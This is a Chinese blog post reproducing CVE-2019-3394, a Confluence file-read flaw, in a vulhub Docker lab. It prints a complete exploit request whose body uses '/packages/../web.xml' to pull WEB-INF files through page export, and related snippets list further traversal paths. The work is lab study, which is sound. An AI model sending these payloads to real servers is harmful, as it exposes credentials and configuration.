Confluence 文件读取漏洞复现(CVE-2019-3394)

最新推荐文章于 2024-09-05 05:28:19 发布
最新推荐文章于 2024-09-05 05:28:19 发布
阅读量1.5k 收藏
点赞数
分类专栏: 中间件漏洞复现 文章标签: confluence 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/110721095
版权

声明

好好学习,天天向上

漏洞描述

Atlassian Confluence是企业广泛使用的wiki系统
Confluence Server 和 Data Center 在页面导出功能中存在本地文件泄露漏洞:具有“添加页面”空间权限的远程攻击者,能够读取 /confluence/WEB-INF/ 目录下的任意文件。 该目录可能包含用于与其他服务集成的配置文件,可能会泄漏认证凭据,例如 LDAP 认证凭据或其他敏感信息。

影响范围

6.1.0 <= version < 6.6.16

6.7.0 <= version < 6.13.7

6.14.0 <= version < 6.15.8

复现过程

这里使用6.10.2版本

使用vulhub的cve-2019-3396版(搭建难度还是有的,所以不要轻易放弃,所以这里安装过程和3396的一样啦)

cd /app/vulhub-master/confluence/CVE-2019-3396

使用docker启动

docker-compose up -d

搭建过程可参考

https://blog.csdn.net/nex1less/article/details/102783999

https://www.cnblogs.com/Zh1z3ven/p/13755525.html

环境的话建议给虚机分配4G以上内存,我这里本身docker是2G,直接崩了,我又临时调到8G(以后再也不吝啬了),然后还得重新删镜像拉镜像

环境启动后,访问http://your-ip:8090会进入安装引导,选择“Trial installation”,之后会要求填写license key。点击“Get an evaluation license”,去Atlassian官方申请一个Confluence Server的测试证书,这一步稍微有点繁琐,有点耐心,需要填写邮箱然后注册(不要选择Data Center和Addons):

http://192.168.239.129:8090

最好先在安装页面,这里最好记录下ServerID

BLQS-RN83-KEI3-FET1

获取后,点next

在这里插入图片描述

就是这里,我也是docker-compose up/down反复搞了好久,才进入到用户管理配置

在这里插入图片描述

墙内用户,该跳过的跳过

点击创建,进入到创建的页面,写好标题和正文内容,再点击右下角发布抓包

在这里插入图片描述

这是我的报文内容(不太好抓,BP里面每个请求转发时都搜索关键字就好了)

PUT /rest/api/content/65617?status=draft HTTP/1.1
Host: 192.168.239.129:8090
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.239.129:8090/pages/resumedraft.action?draftId=65617&draftShareId=4b88b998-1600-40c9-b35c-e47e9f674494
Content-Length: 369
Cookie: LxuP_2132_saltkey=OMF1tm3T; LxuP_2132_lastvisit=1606894588; LxuP_2132_ulastactivity=2f71gpPVBSW4xfz43JuiDfM%2F0mpBLLmtHNRn8C61FS4kFgZxTJ8n; LxuP_2132_lastcheckfeed=1%7C1606898453; LxuP_2132_nofavfid=1; qMBc_2132_sid=I5b1w1; qMBc_2132_saltkey=xAQhmQRQ; qMBc_2132_lastvisit=1606973661; qMBc_2132_lastact=1606977478%09misc.php%09patch; qMBc_2132_seccode=3.8a8437292a0e156a9d; qMBc_2132_ulastactivity=631euTfLsH2SDcarY2CPsrtGmLOXGlUTjkv4obaoQSepXdhgy%2FGV; qMBc_2132_auth=d792eKiQ1yQS9rIoiBOJa0b%2Fl00zf%2FhOfWYYIVhN3wo%2FZ0YV%2F5C4tp3ARdfVKedcqKN3UpF8iCP0fafvPC7P; qMBc_2132_lastcheckfeed=2%7C1606977275; qMBc_2132_lip=Manual+Acting%2C1606977251; qMBc_2132_nofavfid=1; dH5g_2132_saltkey=mIQcCC5I; dH5g_2132_lastvisit=1606974982; dH5g_2132_sid=VUkTKd; dH5g_2132_lastact=1606978855%09home.php%09spacecp; dH5g_2132_seccode=2.c3d57b048c88d7cffb; dH5g_2132_ulastactivity=e35aNpy3yHC6zAiJV0YMLXLqujGMC5T7dTcg3FEpx4Z5H045HtB7; dH5g_2132_auth=488bFp2bXZh3XFx5QvQ27pop6p6FOFc0UWqVC%2B9ZL3NfnF6LvmjrAnEPp0STuBqLt0Y6Qy5dlXCiDLRx50j2; dH5g_2132_nofavfid=1; wxTp_2132_sid=ROOfYq; wxTp_2132_saltkey=WE8r8h8K; wxTp_2132_lastvisit=1606976300; wxTp_2132_lastact=1606980407%09misc.php%09patch; wxTp_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; wxTp_2132_seccode=7.afaaaba06ac830f87b; wxTp_2132_ulastactivity=a1876qkUep0STAD5x6RGuzSW4OfiO1Xr1STrKzcpTYkR4jRmZDut; wxTp_2132_auth=1f91XJ4rWdWCYb%2BlhT8DUPCbp0A0u1XXn1CwCdHY2GJOYPrT4vnE2tuD8t2ddGpp05JwPni8cby%2FnCEoh5H5; wxTp_2132_lastcheckfeed=1%7C1606980025; wxTp_2132_lip=192.168.239.158%2C1606979545; wxTp_2132_nofavfid=1; oEc_sid=vVVHvY; oEc_cookietime=2592000; oEc_auth=4a95ARoccwG5crxEL5hybGcp7IZoXNQMyju4wnvsJB3pZxJdh43N6udrFX8INT7g%2BXQR%2BEQ6zzHbUSI87IzNgQ; oEc_visitedfid=2; smile=1D1; redirect=1; JSESSIONID=58A795CE4E26BC6B82A91D2DCAD4AC81; seraph.confluence=491521%3Adb2261de7e3dd0b193d49ab9265b2abdb8b5e91e
DNT: 1
Connection: close

{"status":"current","title":"test","space":{"key":"ADMIN"},"body":{"editor":{"value":"<p><img class=\"confluence-embedded-image\" src=\"/packages/../web.xml\" /></p>","representation":"editor","content":{"id":"65617"}}},"id":"65617","type":"page","version":{"number":1,"minorEdit":true,"syncRev":"0.VwIMZFtQ5GXSeMJG6YTOkQ.0"},"ancestors":[{"id":"65584","type":"page"}]}

在这里插入图片描述

这一步比较关键,怎么说呢,在转发的时候修改,成功的几率比较大,最好不要放重放里,我这一次成功是通过,先插入一个图片,图片来自网络,修改图片URL为

/packges/../web.xml

图片插入成功后,一定记住最终攻击都是在更新的按钮,抓包修改的(也就是上一张图和上述代码),点击更新后,看准了POST的接口,修改整个POST请求体为,我是在转发的时候改的,用重放,虽然报的200,但是文件读取失败了

{"status":"current","title":"test","space":{"key":"ADMIN"},"body":{"editor":{"value":"<p><img class=\"confluence-embedded-image\" src=\"/packages/../web.xml\" /></p>","representation":"editor","content":{"id":"65617"}}},"id":"65617","type":"page","version":{"number":1,"minorEdit":true,"syncRev":"0.VwIMZFtQ5GXSeMJG6YTOkQ.0"},"ancestors":[{"id":"65584","type":"page"}]}

成功后,可以看到我们已经把src成功插入到html中,怎么这么像XSS

在这里插入图片描述

点击右下角更新按钮后,F5刷新一下,可以看到右上角有个三个点。。。,点击导出word后,抓包,方便查看文件

在这里插入图片描述

在这里插入图片描述

关闭镜像(每次用完后关闭)

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
维梓-
关注
专栏目录
漏洞复现】Atlassian Confluence(CVE-2022-26134)OGNL远程代码执行
做自己喜欢的事,并将其发挥到极致!
06-06 2248
本篇文章所涉及技术与工具仅用于技术研究、漏洞复现,切勿用于非法渗透攻击行为,造成任何后果与本作者无关,切记!!!Atlassian Confluence 是一款各企业广泛使用的 wiki 系统。在上存在OGNL 注入漏洞,恶意攻击者可以利用该漏洞在目标Atlassian Confluence Server and Data Center服务器上注入恶意ONGL表达式 ,造成远程代码执行。......
Confluence漏洞学习——CVE-2021-26084/85,CVE-2022-26134漏洞复现
记录并分享学习安全的知识点..
07-24 2971
​ Atlassian Confluence是Atlassian公司出品的专业wiki程序。它可以作为一个知识管理的工具,通过它能够实现团队成员之间的协作和知识共享。攻击者在经过身份验证或在特定环境下未经身份验证的情况下,可构造OGNL表达式进行注入,实现在 Confluence Server或Data Center上执行任意代码。 ​.........
漏洞复现|(CVE-2019-3396)Confluence文件读取&远程命令执行
weixin_42282189的博客
10-22 1205
作者: 墨阳 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 前言 1、漏洞简介 Confluence是一个专业的企业知识管理与协同软件,常用于构建企业wiki。它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。Confluence Server 与 Confluence Data Center 中的 Widget Connector 存在服务端模板注入漏洞,攻击者构造特定请求可远程遍历服务器任意文件,进而可以包含恶意文件来执行代码.
CVE-2024-26084(confluence
最新发布
2401_86437117的博客
09-05 1114
Confluence Server、Confluence Data Center等产品存在OGNL 注入漏洞,允许经过身份验证的用户(在某些情况下的未经身份验证的用户)在 Confluence Server或Confluence Data Center实例上执行任意代码。
Confluence 文件读取漏洞(CVE-2019-3394)复现
zzgslh的博客
04-07 778
漏洞详情】 Atlassian Confluence是企业广泛使用的wiki系统 Confluence Server 和 Data Center 在页面导出功能中存在本地文件泄露漏洞:具有“添加页面”空间权限的远程攻击者,能够读取 /confluence/WEB-INF/ 目录下的任意文件。 该目录可能包含用于与其他服务集成的配置文件,可能会泄漏认证凭据,例如 LDAP 认证凭据或其他敏感信息...
Confluence任意文件读取
打代码的小女孩
11-17 1967
影响系统 Atlassian Confluence 4.x 危害 远程攻击者利用漏洞上传恶意附件。 攻击所需条件 攻击者必须访问Atlassian Confluence漏洞信息 Atlassian Confluence(简称Confluence)是一个专业的wiki程序。它是一个知识管理的工具,通过它可以实现团队成员之间的协作和知识共享。 ...
Confluence 文件读取漏洞(CVE-2019-3394)分析
chr8230401的博客
09-03 601
作者: Badcode@知道创宇404实验室 日期: 2019/08/29 英文版本: https://paper.seebug.org/1026/ 前言 下午 @fnmsd 师傅发了个 Confluence 的预警给我,我看了下补丁,复现了这个漏洞,本篇文章记录下这个漏洞的应急过程。 看下...
CVE-2019-3396:Confluence 文件读取漏洞复现
nex1less的博客
11-26 4586
0x01 漏洞描述 Atlassian Confluence是企业广泛使用的wiki系统,其6.14.2版本前存在一处未授权的目录穿越漏洞,通过该漏洞,攻击者可以读取任意文件,或利用Velocity模板注入执行任意命令。 0x02 漏洞环境 1.根据我过往博客安装vulhub 2.cd 到指定目录: cd vulhub/confluence/CVE-2019-3396 ...
[ vulhub漏洞复现篇 ] Drupal 远程代码执行漏洞CVE-2019-6339)
qq_51577576的博客
02-20 608
[ vulhub漏洞复现篇 ] Drupal 远程代码执行漏洞CVE-2019-6339) Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。Drupal core 7.62之前的7.x版本、8.6.6之前的8.6.x版本和8.5.9之前的8.5.x版本中的内置phar stream wrapper(PHP)存在远程代码执行漏洞。远程攻击者可利用该漏洞执行任意的php代码。
Atlassian Confluence 路径穿越与命令执行漏洞 CVE-2019-3396
山兔的博客
08-07 493
2.影响版本:6.6.12之前所有6.6.x版本,6.12.3之前所有6.12.x版本,6.13.13之前所有6.13.x版本,6.14.2之前所有6.14.x版本。访问服务器ip地址,如:192.168.109.130:8090 进行安装,安装步骤如下:选择Trial Installation——》Next。直接使用邮箱账号,点击New Trial License——》select product——》Confluence。然后会让你填写用户名,如果提示填写路径,路径填写。我这边建立失败了,就不复现了。
Atlassian Confluence CVE-2022-26134 RCE漏洞
sxr__nc的博客
04-22 1114
漏洞环境搭建前期主要搭建动态调试环境,但是一直失败(这里主要记录下动态调试环境搭建过程,待之后再碰到类似的问题,希望能够解决)通常称为服务端小程序,是服务端的程序,用于处理及响应客户的请求。之后即可直接调试(这次是成功了的,可以正常动态调试,反思和之前不一样的操作就是在弹出。直接对比补丁包的修改,入手点参考网上已有的分析报告.主要参考链接在文末给出.填入密钥,因为我这里已经注册过了,所以直接填入密钥,没注册过,可以点击。的环境基本上已经搭建完毕了,接下来进行网站设置,我选择的是。(直接进行动态调试)
CVE-2019-3394:[Confluence]敏感信息泄露漏洞
公众号shadow sock7
09-03 2105
这次没咋分析: https://mp.weixin.qq.com/s/puRrvfqWFVKvQ0hOoVs8lQ 写了一个poc: https://github.com/shadowsock5/Poc/tree/master/Confluence ,需要修改: url、用户名、密码、你自己的空间名 然后切换payload,改一下数字就行了。 最后confluence是加了一个过滤函数,判断...
Confluence文件读取漏洞复现
Websec
03-06 1361
1、Confluence系统都存在漏洞漏洞poc如下: /s/xx/_/;/WEB-INF/web.xml /s/xx/_/;/WEB-INF/decorators.xml /s/xx/_/;/WEB-INF/classes/seraph-config.xml /s/xx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties /s/xx/_/;/META-INF/maven/com.atlassian.jir
confluence漏洞复现
Shanfenglan's blog
12-02 3895
文章目录1. confluence路径穿越与命令之执行 (CVE-2019-3396)1.1 利用2. Confluence OGNL表达式注入代码执行漏洞CVE-2021-26084)2.1 利用参考文章 1. confluence路径穿越与命令之执行 (CVE-2019-3396) 影响版本:6.14.2版本前 通过该漏洞,攻击者可以读取任意文件,或利用Velocity模板注入执行任意命令。 1.1 利用 POST /rest/tinymce/1/macro/preview HTTP/1.1 Host
Atlassian Confluence 远程代码执行漏洞CVE-2022-26134)复现
weixin_42489549的博客
06-29 8989
CVE-2022-26134 Confluence远程命令执行漏洞复现
Atlassian Confluence 任意文件读取
HxXh
07-13 1791
Atlassian Confluence 任意文件读取Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。该软件可实现团队成员之间的协作和知识共享。Atlassian Confluence 5.8.17之前版本中存在安全该漏洞源于spaces/viewdefaultdecorator.action和admin/vi...
Atlassian Confluence 远程代码执行漏洞CVE-2022-26134)漏洞复现
网安君的博客
06-07 3098
本文章仅供学习和研究使用,严禁使用该文章内容对互联网其他应用进行非法操作,若将其用于非法目的,所造成的后果由您自行承担,产生的一切风险与本文作者无关,如继续阅读该文章即表明您默认遵守该内容。CVE-2022-26134的漏洞是一个严重的未经身份验证的远程代码执行漏洞,通过 OGNL 注入利用并影响 1.3.0 版之后的所有 Atlassian Confluence 和 Data Center 2016 服务器。成功利用允许未经身份验证的远程攻击者创建新的管理员帐户、执行命令并最终接管服务器。1.3.0 ..
CVE-2022-26138 Confluence Server硬编码漏洞复现
热爱学习,喜欢折腾!
10-13 2538
Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。7月,Atlassian官方发布了2022年7月的安全更新,其中涉及到Confluence Server的多个漏洞,其中CVE-2022-26138为一个硬编码漏洞
CVE-2021-26086
05-22
CVE-2021-26086是一个影响Atlassian Confluence Server和Data Center的高危漏洞。攻击者可以利用这个漏洞执行远程代码,可能导致服务器完全被控制。这个漏洞是因为Confluence Server和Data Center中的Ognl表达式注入...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值